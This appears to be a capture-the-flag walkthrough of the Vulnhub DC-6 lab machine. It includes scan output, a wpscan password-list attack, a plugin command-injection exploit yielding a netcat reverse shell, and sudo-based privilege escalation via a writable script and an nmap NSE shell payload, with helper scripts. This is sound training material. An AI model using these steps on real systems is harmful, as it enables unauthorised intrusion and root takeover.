DC6

DC: 6 Vulnhub Walkthrough

Enumeration

nmap

nmap -sC -sV -oA nmap/DC6 192.168.1.115
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-18 07:20 EDT
Stats: 0:00:09 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 100.00% done; ETC: 07:20 (0:00:00 remaining)
Nmap scan report for wordy (192.168.1.115)
Host is up (0.00016s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 3e:52:ce:ce:01:b6:94:eb:7b:03:7d:be:08:7f:5f:fd (RSA)
|   256 3c:83:65:71:dd:73:d7:23:f8:83:0d:e3:46:bc:b5:6f (ECDSA)
|_  256 41:89:9e:85:ae:30:5b:e0:8f:a4:68:71:06:b4:15:ee (ED25519)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-generator: WordPress 5.1.1
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Wordy – Just another WordPress site
|_https-redirect: ERROR: Script execution failed (use -d to debug)
MAC Address: 00:0C:29:EC:F5:FF (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.11 seconds

Next, as usual, browse to the IP address and see what comes back.

The site redirects to a URL on the hostname wordy, which does not resolve yet.

Add an /etc/hosts entry on the attacking machine mapping 192.168.1.115 to wordy.

Reload the browser.

The WordPress site now loads.

Dirb

dirb http://192.168.1.115
-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Mon May 18 07:56:05 2020
URL_BASE: http://192.168.1.115/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.1.115/ ----
+ http://192.168.1.115/index.php (CODE:200|SIZE:53227)                                                     
+ http://192.168.1.115/server-status (CODE:403|SIZE:301)                                                   
==> DIRECTORY: http://192.168.1.115/wp-admin/                                                              
==> DIRECTORY: http://192.168.1.115/wp-content/                                                            
==> DIRECTORY: http://192.168.1.115/wp-includes/                                                           
+ http://192.168.1.115/xmlrpc.php (CODE:405|SIZE:42)          

Navigating to /wp-admin redirects to the login form.

After poking around, nothing else of interest turns up, so we move on to wpscan.

wpscan

wpscan --url http://wordy --enumerate u
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.1
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://wordy/ [192.168.1.115]
[+] Started: Mon May 18 08:00:12 2020

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.25 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://wordy/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] http://wordy/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://wordy/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.1.1 identified (Insecure, released on 2019-03-13).
 | Found By: Rss Generator (Passive Detection)
 |  - http://wordy/index.php/feed/, <generator>https://wordpress.org/?v=5.1.1</generator>
 |  - http://wordy/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.1.1</generator>

[+] WordPress theme in use: twentyseventeen
 | Location: http://wordy/wp-content/themes/twentyseventeen/
 | Last Updated: 2020-03-31T00:00:00.000Z
 | Readme: http://wordy/wp-content/themes/twentyseventeen/README.txt
 | [!] The version is out of date, the latest version is 2.3
 | Style URL: http://wordy/wp-content/themes/twentyseventeen/style.css?ver=5.1.1
 | Style Name: Twenty Seventeen
 | Style URI: https://wordpress.org/themes/twentyseventeen/
 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 2.1 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://wordy/wp-content/themes/twentyseventeen/style.css?ver=5.1.1, Match: 'Version: 2.1'

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <==============================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] admin
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://wordy/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] graham
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] mark
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] sarah
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] jens
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up

[+] Finished: Mon May 18 08:00:15 2020
[+] Requests Done: 59
[+] Cached Requests: 6
[+] Data Sent: 13.316 KB
[+] Data Received: 640.55 KB
[+] Memory used: 172.594 MB
[+] Elapsed time: 00:00:03

wpscan identifies five usernames: admin, graham, mark, sarah and jens.

Put them in a text file, one per line (name.txt).

The author's note on the Vulnhub page saves us from brute-forcing the whole of rockyou: filter rockyou.txt down to the entries containing k01 and use that as the password list (pass.txt).

Then run wpscan's password attack against the site (wpscan 3.x takes the target via --url; pointing it at the login page is not needed):

wpscan --url http://wordy --usernames name.txt --passwords pass.txt

It finds one valid pair: mark / helpdesk01
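The list-building steps above, as an added shell example that is not part of the original walkthrough: extract_users() pulls the five usernames out of saved wpscan output, filter_wordlist() applies the author's k01 hint to a wordlist, and the last line prints the wpscan command that consumes the two files. The wpscan excerpt and the six-line wordlist embedded below are constructed stand-ins; the real attack uses /usr/share/wordlists/rockyou.txt.

```shell
#!/usr/bin/env bash
# Added example (not from the original walkthrough): build the two files wpscan's password
# attack needs, the username list from the enumeration output and a password list trimmed
# down with the author's "k01" hint, then show the wpscan invocation that uses them.
set -u

# Usernames appear as bare "[+] name" lines after the "User(s) Identified:" marker.
# Earlier "[+] Headers"-style findings are skipped by the marker; the later summary lines
# ("[+] Finished: ...", "[+] Requests Done: 59") have more than two fields and are skipped too.
extract_users() {
    awk '/User\(s\) Identified/ { inusers = 1 }
         inusers && /^\[[+]\] / && NF == 2 { print $2 }'
}

# Keep only wordlist entries containing the hinted substring. Against the real 14-million-line
# rockyou.txt this leaves a small fraction, which is why the attack finishes in seconds.
filter_wordlist() {
    grep -F -- "$1"
}

workdir="$(mktemp -d)"

# Constructed excerpt of the wpscan --enumerate u output shown above (same layout, trimmed).
wpscan_out='[+] Headers
 | Interesting Entry: Server: Apache/2.4.25 (Debian)

[i] User(s) Identified:

[+] admin
 | Found By: Rss Generator (Passive Detection)

[+] graham
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)

[+] mark

[+] sarah

[+] jens

[+] Finished: Mon May 18 08:00:15 2020
[+] Requests Done: 59'

# Constructed stand-in for /usr/share/wordlists/rockyou.txt: six lines, not the real file.
sample_wordlist='123456
password
helpdesk01
Gsk01x
letmein
k01'

printf '%s\n' "$wpscan_out" | extract_users > "$workdir/name.txt"
printf '%s\n' "$sample_wordlist" | filter_wordlist k01 > "$workdir/pass.txt"

printf 'users:     %s\n' "$(tr '\n' ' ' < "$workdir/name.txt")"
printf 'passwords: %s\n' "$(tr '\n' ' ' < "$workdir/pass.txt")"
# The lab run (not executed here). wpscan 3.x takes the site with --url; -U/-P are the
# short forms of --usernames/--passwords.
printf 'wpscan --url http://wordy -U %s -P %s\n' "$workdir/name.txt" "$workdir/pass.txt"
```

The marker-gated awk matters: without it, "[+] Headers" from the findings section would end up in the username list and waste a column of login attempts.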

Log in to WordPress with these credentials.

We are now in mark's account.

Exploitation

Searchsploit

Once logged in as mark, the dashboard shows the Activity monitor plugin, so I searched searchsploit for an exploit against it.

The exploit we want is the third result.

Copy the file to a working directory (searchsploit -m does this).

Open it in an editor.

It is an HTML form that submits a command-injection payload to the plugin's lookup page; the payload spawns a shell with netcat once the form is submitted.

Change the URL from localhost to wordy, and set the netcat payload to connect back to your IP and the port you want to listen on.

First set up the listener on the attacking machine:

nc -nlvp 4444

Then open the modified file in the browser session where you are logged in as mark; the form needs that authenticated session to reach the plugin page.

Click Submit request.

Once the shell connects back, type

python -c 'import pty; pty.spawn("/bin/bash")'

to get a proper TTY.

Then navigate to /home/mark/stuff, which contains a file called things-to-do.txt.

Open it and read the contents.

It includes a password for the graham user, GSo7isUM1D4. Exit the shell and SSH in as graham.

Privilege Escalation

Running sudo -l as graham shows that graham may run /home/jens/backups.sh as the jens user.

The script is writable by graham, so append /bin/bash to backups.sh; when the script is run as jens, the shell it spawns at the end belongs to jens.

Then, type

sudo -u jens /home/jens/backups.sh

That gives a shell as jens. Running sudo -l again shows that jens may run nmap as root.

Look up nmap on GTFOBins and follow its sudo instructions: write a one-line NSE script that executes a shell and run nmap against it with sudo.

We got root!

Navigate to /root to read the flag.
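Both escalation steps, as an added shell example that is not part of the original walkthrough. sudo_targets() parses sudo -l output (the excerpt here is constructed in sudo's layout, since the walkthrough's screenshot is not reproduced), writable_sudo_targets() flags the backups.sh case, and nmap_nse_shell() writes the GTFOBins-style NSE payload; the sudo commands themselves appear in comments rather than being executed, and the demo backups.sh content is a stand-in.

```shell
#!/usr/bin/env bash
# Added example (not from the original walkthrough): audit a `sudo -l` listing for the two
# weaknesses chained on DC-6, a sudo-runnable script the caller can modify (graham -> jens)
# and a sudo-runnable binary that can spawn a shell (jens -> root, nmap via an NSE script).
set -u

# Pull the command paths out of `sudo -l` output. The relevant lines look like
#     (jens) NOPASSWD: /home/jens/backups.sh
# Entries without an absolute path, such as "(ALL : ALL) ALL", are ignored.
sudo_targets() {
    sed -n 's/^[[:space:]]*([^)]*)[[:space:]]*\(NOPASSWD:[[:space:]]*\)*\(\/[^[:space:],]*\).*/\2/p'
}

# Anything we can write to and then run as another user through sudo is a shell as that user.
writable_sudo_targets() {
    local path
    while IFS= read -r path; do
        if [ -w "$path" ]; then printf '%s\n' "$path"; fi
    done
    return 0
}

# Stage 1 (graham -> jens): make the sudo-runnable script end in a shell, as the walkthrough does.
# Appending only works if the script reaches its last line; if it can stop early (set -e,
# a failing command, an explicit exit), put the shell line at the top instead.
# Afterwards:  sudo -u jens /home/jens/backups.sh
add_shell_to_script() {
    printf '%s\n' '/bin/bash' >> "$1"
}

# Stage 2 (jens -> root): NSE scripts are Lua, and Lua can exec a shell. Old nmap had
# --interactive for this; current versions do not, hence the script route. Writes the
# one-line script and prints its path. Afterwards:  sudo nmap --script="$(nmap_nse_shell)"
nmap_nse_shell() {
    local script="${1:-$(mktemp)}"
    printf '%s\n' 'os.execute("/bin/sh")' > "$script"
    printf '%s\n' "$script"
}

# --- Demo on constructed data; the real box is not touched ---
demo_dir="$(mktemp -d)"
printf '%s\n' '#!/bin/bash' 'tar -czf /tmp/backups.tar.gz /var/www/html' > "$demo_dir/backups.sh"
chmod 666 "$demo_dir/backups.sh"     # stands in for the backups.sh graham can write to

# Constructed `sudo -l` excerpt in sudo's own layout (the walkthrough's screenshot is not
# reproduced); the nmap entry is what jens sees later.
sudo_l_output="User graham may run the following commands on wordy:
    (jens) NOPASSWD: $demo_dir/backups.sh
    (root) NOPASSWD: /usr/bin/nmap"

printf 'sudo targets:\n';   printf '%s\n' "$sudo_l_output" | sudo_targets
printf 'writable by us:\n'; printf '%s\n' "$sudo_l_output" | sudo_targets | writable_sudo_targets
add_shell_to_script "$demo_dir/backups.sh"
nse="$(nmap_nse_shell "$demo_dir/shell.nse")"
printf 'NSE payload %s: %s\n' "$nse" "$(cat "$nse")"
```

The same two checks are what a defender runs in reverse: no sudoers target should be writable by the user allowed to invoke it, and binaries that can execute arbitrary code (nmap, editors, interpreters) should never be granted as root via sudo.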

Congratulations!
